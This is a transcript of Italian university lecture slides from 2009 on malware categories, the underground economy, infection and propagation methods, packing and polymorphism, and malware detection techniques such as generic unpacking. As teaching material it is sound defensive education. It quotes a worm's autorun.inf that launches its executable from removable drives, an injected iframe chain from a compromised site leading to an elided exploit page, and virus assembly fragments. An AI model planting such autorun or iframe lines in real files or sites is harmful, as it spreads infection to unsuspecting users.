Malware e underground economy

Transcript

1 Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2009/2010 Malware e underground economy Roberto Paleari roberto@security.dico.unimi.it 14 dicembre 2009 R. Paleari Malware e underground economy 14 dicembre / 41

2 Introduzione R. Paleari Malware e underground economy 14 dicembre / 41

3 Malware sequenza di codice progettata per danneggiare intenzionalmente un sistema, i dati che contiene o comunque alterare il suo normale funzionamento, all insaputa dell utente R. Paleari Malware e underground economy 14 dicembre / 41

4 Tipologie di malware replicazione no replicazione replicazione autonoma Virus Rootkit Trojan horse Worm Dialer Spyware Keylogger necessita ospite nessun ospite dipendenza da ospite R. Paleari Malware e underground economy 14 dicembre / 41

5 Tipologie di malware Virus & worm Virus Worm replicazione autonoma necessitano di un ospite in cui inserirsi propagazione attraverso la diffusione dell ospite non necessitano di un ospite propagazione autonoma attraverso la rete capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità R. Paleari Malware e underground economy 14 dicembre / 41

6 Tipologie di malware Virus & worm Virus replicazione autonoma necessitano di un ospite in cui inserirsi propagazione attraverso la diffusione dell ospite riproduzione Worm non necessitano di un ospite propagazione autonoma attraverso la rete capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità payload infezione R. Paleari Malware e underground economy 14 dicembre / 41

7 Tipologie di malware Trojan horse & backdoor Trojan horse funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware R. Paleari Malware e underground economy 14 dicembre / 41

8 Tipologie di malware Trojan horse & backdoor Trojan horse Backdoor funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware per assicurare l accesso ad un sistema compromesso rientrano in questa categoria i RAT (Remote Access Trojan) R. Paleari Malware e underground economy 14 dicembre / 41

9 Tipologie di malware Trojan horse & backdoor Trojan horse Backdoor Rootkit funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware per assicurare l accesso ad un sistema compromesso rientrano in questa categoria i RAT (Remote Access Trojan) strumenti utilizzati per mantenere l accesso ad un sistema compromesso senza fare nascere sospetti utilizzati per nascondere file, processi, connessioni di rete,... sia a livello kernel che a livello utente R. Paleari Malware e underground economy 14 dicembre / 41

10 Nuove minacce Number of new threats Jan-Jun 2008 Jul-Dec 2007 Jan-Jun 2007 Jul-Dec 2008 Jan-Jun 2009 Period Fonte: Symantec R. Paleari Malware e underground economy 14 dicembre / 41

11 Malware & underground economy R. Paleari Malware e underground economy 14 dicembre / 41

12 Phishing R. Paleari Malware e underground economy 14 dicembre / 41

13 Phishing R. Paleari Malware e underground economy 14 dicembre / 41

14 Scam R. Paleari Malware e underground economy 14 dicembre / 41

15 Come funziona? 1 campagna di spam R. Paleari Malware e underground economy 14 dicembre / 41

16 Come funziona? 1 campagna di spam 2 social engineering GET /... R. Paleari Malware e underground economy 14 dicembre / 41

17 Come funziona? 1 campagna di spam 2 social engineering 3 furto credenziali & malware R. Paleari Malware e underground economy 14 dicembre / 41

18 Come funziona? 1 campagna di spam 2 social engineering 3 furto credenziali & malware 4 infezione macchine R. Paleari Malware e underground economy 14 dicembre / 41

19 Underground economy Vendita informazioni rubate Goods & services Percentage Range of prices Bank accounts 22% $10-$1000 Credit cards 13% $0.40-$20 Full identities 9% $1-$15 Online auction site accounts 7% $1-$8 Scams 7% $2.50-$50/week (hosting) Mailers 6% $1-$10 addresses 5% $0.83/MB-$10/MB passwords 5% $4-$30 Drop (request or offer) 5% 10%-20% of drop amount Proxies 5% $1.50-$30 Fonte: Symantec R. Paleari Malware e underground economy 14 dicembre / 41

20 Underground economy Furto credenziali Portata del fenomeno Università di Mannheim Limbo & ZeuS 70 dropzone 33 GB di dati account bancari, account mail Dropzone # Machines Data amount Country webpinkxxx.cn 26, GB China coxxx-google.cn 12, GB Malaysia 77.XXX , MB Russia finxxxonline.com 6, MB Estonia Other 108, GB Total 164, GB Fonte: Learning More About the Underground Economy T. Holz, M. Engelberth, F. Freiling, 2008 R. Paleari Malware e underground economy 14 dicembre / 41

21 Underground economy Malware as a service Bot in affitto ( $1000-$2000/mese) MPACK: exploit toolkit a $1000 R. Paleari Malware e underground economy 14 dicembre / 41

22 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... R. Paleari Malware e underground economy 14 dicembre / 41

23 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? R. Paleari Malware e underground economy 14 dicembre / 41

24 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? Human computation! > 100K captcha al giorno, $1.5-$8 per 1000 captcha R. Paleari Malware e underground economy 14 dicembre / 41

25 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? Human computation! R. Paleari Malware e underground economy 14 dicembre / 41

26 Funzionalità del malware Non solo spam... mass-mailing (Sobig) HTTP/SOCKS proxy (MyDoom) SMTP proxy (Taripox, Happy99) diffusione tramite IM (Peacomm) R. Paleari Malware e underground economy 14 dicembre / 41

27 Funzionalità del malware Furto credenziali Obiettivi credenziali account bancari/posta serial prodotti commerciali (Agobot) harvesting Come? installazione plugin BHO/XUL modifica C:\Windows\...\etc\hosts keylogging screen grabbing R. Paleari Malware e underground economy 14 dicembre / 41

28 Funzionalità del malware Click fraud Google: 10% dei click sono fraudolenti ( $1B) Clickbot.A ( 50k host infetti) molti clickbot commerciali ClickJacking R. Paleari Malware e underground economy 14 dicembre / 41

29 Funzionalità del malware Anti-anti-virus kill processi in esecuzione vari hook per auto-start prima dell AV impedire aggiornamento AV corruzione DB signature kernel-level callback via PsSetLoadImageNotifyRoutine()... R. Paleari Malware e underground economy 14 dicembre / 41

30 Funzionalità del malware Botnet... argomento della prossima lezione R. Paleari Malware e underground economy 14 dicembre / 41

31 Tecniche di infezione File/device infection file infection tecnicamente complesso con PE Virut EPO file infector entry programma infezione programma virus entry R. Paleari Malware e underground economy 14 dicembre / 41

32 Tecniche di infezione File/device infection file infection infezione device removibili Knight: autorun.inf [autorun] open=knight.exe open icon=knight.exe,0 shellexecute=knight.exe open shell=auto action=disk Knight(Protection Against Mobile Disk Viruses) shell\auto=&auto shell\auto\command=knight.exe open shell\open=&open shell\open\command=knight.exe open shell\explore=e&xplore shell\explore\command=knight.exe open shell\find=s&earch... shell\find\command=knight.exe open... R. Paleari Malware e underground economy 14 dicembre / 41

33 Tecniche di infezione File/device infection file infection infezione device removibili root-kit user vs kernel level obiettivo: nascondere processi, file, connessioni di rete,... hooking a diversi livelli (IDT,SSDT,DKOM,... ) Attacking SMM Memory via Intel CPU Cache Poisoning (19/3/2009) EPROCESS csrss.exe EPROCESS malware.exe EPROCESS svchost.exe R. Paleari Malware e underground economy 14 dicembre / 41

34 Tecniche di infezione File/device infection file infection infezione device removibili root-kit user vs kernel level obiettivo: nascondere processi, file, connessioni di rete,... hooking a diversi livelli (IDT,SSDT,DKOM,... ) Attacking SMM Memory via Intel CPU Cache Poisoning (19/3/2009) EPROCESS csrss.exe EPROCESS malware.exe EPROCESS svchost.exe R. Paleari Malware e underground economy 14 dicembre / 41

35 Tecniche di infezione File/device infection file infection infezione device removibili root-kit R. Paleari Malware e underground economy 14 dicembre / 41

36 Tecniche di infezione File/device infection file infection infezione device removibili root-kit MBR/boot infection Trojan.Mebroot (11/2007) infezione \\.\PhysicalDrive{0-15} ( compresi device USB) root-kit, furto credenziali bancarie This malware is very professionally written and produced (F-Secure) R. Paleari Malware e underground economy 14 dicembre / 41

37 Tecniche di propagazione Propagation mechanisms Percentage File sharing executables 40% File transfer/ attachment 32% File transfer/cifs 28% File sharing/p2p 19% Remotely exploitable vulnerability 17% SQL 3% Back door/kuang2 3% Back door/subseven 3% File transfer/embedded HTTP URI/Yahoo! Messenger 2% Web 1% Fonte: Symantec, 2007 R. Paleari Malware e underground economy 14 dicembre / 41

38 Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre / 41

39 Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre / 41

40 Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre / 41

41 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre / 41

42 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre / 41

43 Tecniche di propagazione Remote exploit + drive-by-download Dolphin Stadium link a JS maligno nel sito exploit MS MS download keylogger/backdoor 3 giorni prima del Super Bowl! R. Paleari Malware e underground economy 14 dicembre / 41

44 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre / 41

45 Tecniche di propagazione Remote exploit + drive-by-download parishilton.com <iframe> maligno download binario da you69tube.com information-stealing (variante di Zbot?) exploit PDF (overflow) If you screw around with Paris you might get a virus... Commento su ZDNet R. Paleari Malware e underground economy 14 dicembre / 41

46 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime R. Paleari Malware e underground economy 14 dicembre / 41

47 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) R. Paleari Malware e underground economy 14 dicembre / 41

48 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) R. Paleari Malware e underground economy 14 dicembre / 41

49 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) h.js document. w r i t e ( <i f r a m e s r c = h t t p : / /... / admin /News/ f a q. htm ></i f r a m e> ) ; document. w r i t e ( <i f r a m e s r c = h t t p : / /... / i. htm ></i f r a m e> ) ; faq.htm <i f r a m e s r c=h t t p : / /... / i. htm width =100 h e i g h t=0></ i f r a m e> <s c r i p t s r c= h t t p : / / count y e s. com/ c l i c k. aspx? i d = & l o g o =11 ></ s c r i p t> i.htm <s c r i p t>... e x p l o i t...</ s c r i p t> <s c r i p t s r c= h t t p : / / count y e s. com/ c l i c k. aspx? i d = & l o g o=1 ></ s c r i p t> R. Paleari Malware e underground economy 14 dicembre / 41

50 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI)... aspettare... R. Paleari Malware e underground economy 14 dicembre / 41

51 Soluzioni? R. Paleari Malware e underground economy 14 dicembre / 41

52 Soluzioni? R. Paleari Malware e underground economy 14 dicembre / 41

53 Situazione attuale malware vs AV AV in posizione svantaggiata The amount of new malware has never been higher. Our labs are receiving an average of 25,000 malware samples every day, seven days a week. F-Secure, 2008 R. Paleari Malware e underground economy 14 dicembre / 41

54 Perchè una cosí grande diffusione? omogeneità, connettività e configurazione R. Paleari Malware e underground economy 14 dicembre / 41

55 Perchè una cosí grande diffusione? omogeneità, connettività e configurazione scarsa attenzione R. Paleari Malware e underground economy 14 dicembre / 41

56 Perchè una cosí grande diffusione? omogeneità, connettività e configurazione scarsa attenzione incentivo economico R. Paleari Malware e underground economy 14 dicembre / 41

57 Situazione malware detector Signature-based detectors Fonte: Testing Malware Detectors M. Christodorescu, S. Jha, 2004 R. Paleari Malware e underground economy 14 dicembre / 41

58 Situazione malware detector... qualche dato più recente Rank Detected Missed Product 1 91% 178 Sophos 2 91% 179 AntiVir 3 90% 194 Microsoft 4 90% 195 AVG 5 90% 202 Ikarus 6 89% 213 BitDefender 7 88% 241 Norman 8 88% 247 TrendMicro 9 87% 259 Kaspersky 10 87% 268 F-Secure Fonte: SRI International + VirusTotal, campione di 2064 malware R. Paleari Malware e underground economy 14 dicembre / 41

59 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime R. Paleari Malware e underground economy 14 dicembre / 41

60 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Malicious code R. Paleari Malware e underground economy 14 dicembre / 41

61 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Malicious code R. Paleari Malware e underground economy 14 dicembre / 41

62 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Unpacking routine Malicious code R. Paleari Malware e underground economy 14 dicembre / 41

63 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Unpacking routine Malicious code Problema 80% del malware è packed 200 famiglie di packer, 2000 varianti backlog di 90 famiglie Fonte: Symantec, 2008 R. Paleari Malware e underground economy 14 dicembre / 41

64 Tecniche di self-defense Polimorfismo Esempio ancora corpo cifrato il malware è in grado di mutare la routine di cifratura l e a s i, c o r p o v i r u s nop mov sp, 0682 h sub ax, bx c i c l o : xor [ s i ], s i inc cx xor [ s i ], sp i n c s i add bx, cx dec sp j n z c i c l o c o r p o v i r u s :... le istruzioni evidenziate sono junk code possibile anche instruction reordering, instruction substitution, register replacement,... elevato numero di mutazioni possibili difficile individuare una signature costante R. Paleari Malware e underground economy 14 dicembre / 41

65 Tecniche di self-defense Metamorfismo metamorphics are body-polymorphics (Igor Muttik) W95/Regswap 5A pop edx BF mov edi, 0004 h 8BF5 mov e s i, ebp B80C mov eax, Ch 81C add edx, 0088 h 8B1A mov ebx, [ edx ] 58 pop eax BB mov ebx, 0004 h 8BD5 mov edx, ebp BF0C mov edi, Ch 81C add eax, 0088 h 8B30 mov e s i, [ eax ] W32/Evol BF0F mov edi, Fh 893E mov [ e s i ], e d i 5F pop e d i 52 push edx B640 mov dh, 4 0 BA8BEC5151 mov edx, EC8Bh 53 push ebx 8BDA mov ebx, edx 895 E04 mov [ e s i +0004], ebx BB0F mov ebx, Fh 891E mov [ e s i ], ebx 5B pop ebx 51 push ecx B9CB00C05F mov ecx, 5 FC000CBh 81C1C0EB91F1 add ecx, F191EBC0h 894 E04 mov [ e s i +0004], ecx R. Paleari Malware e underground economy 14 dicembre / 41

66 Tecniche di self-defense Implementazione difficile? R. Paleari Malware e underground economy 14 dicembre / 41

67 Tecniche di self-defense Implementazione difficile? R. Paleari Malware e underground economy 14 dicembre / 41

68 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malicious program Malware detector R. Paleari Malware e underground economy 14 dicembre / 41

69 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???? R. Paleari Malware e underground economy 14 dicembre / 41

70 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? R. Paleari Malware e underground economy 14 dicembre / 41

71 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? Malicious R. Paleari Malware e underground economy 14 dicembre / 41

72 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? Malicious Problemi ogni packer richiede un unpacker specifico troppe famiglie di packer Symantec: da 6 ore a 6 mesi per packer multi-layer packing R. Paleari Malware e underground economy 14 dicembre / 41

73 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking R. Paleari Malware e underground economy 14 dicembre / 41

74 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41

75 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41

76 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41

77 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41

78 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Unpacked Packed code Un po di nomi... OmniUnpack Justin Renovo PolyUnpack R. Paleari Malware e underground economy 14 dicembre / 41

79 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX R. Paleari Malware e underground economy 14 dicembre / 41

80 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Esecuzione pagina 0 R. Paleari Malware e underground economy 14 dicembre / 41

81 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Scrittura pagina 2 W = W {2} R. Paleari Malware e underground economy 14 dicembre / 41

82 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 0 = NtOpenFile Page Access # W WX Esecuzione system call s 0 (non pericolosa e WX = ) R. Paleari Malware e underground economy 14 dicembre / 41

83 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Scrittura pagina 1 W = W {1} R. Paleari Malware e underground economy 14 dicembre / 41

84 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Esecuzione pagina 1 WX = WX {1} (pagine written-then-executed) R. Paleari Malware e underground economy 14 dicembre / 41

85 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 1 = NtOpenKey Page Access # W WX Esecuzione system call s 1 (non pericolosa) R. Paleari Malware e underground economy 14 dicembre / 41

86 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Esecuzione pagina 2 WX = WX {1} R. Paleari Malware e underground economy 14 dicembre / 41

87 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 2 = NtDeleteFile Page Access # W WX Esecuzione system call s 2 (pericolosa) Viene invocato il malware detector per analizzare le pagine in W R. Paleari Malware e underground economy 14 dicembre / 41

88 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Se il programma non è maligno, W e WX diventano e l esecuzione riprende R. Paleari Malware e underground economy 14 dicembre / 41

89 Next-generation malware detector Analisi comportamentale signature-based detection è troppo debole verso tecniche più semantiche R. Paleari Malware e underground economy 14 dicembre / 41

90 Next-generation malware detector Analisi comportamentale signature-based detection è troppo debole verso tecniche più semantiche Soluzioni analisi dinamica granularità a livello di system call NovaShield, ThreatFire, Sana Security,... Problemi performance falsi positivi information leakage... R. Paleari Malware e underground economy 14 dicembre / 41

91 Remediation detection non è sempre possibile remediation dell infezione... ma funziona? R. Paleari Malware e underground economy 14 dicembre / 41

92 Remediation detection non è sempre possibile remediation dell infezione... ma funziona? R. Paleari Malware e underground economy 14 dicembre / 41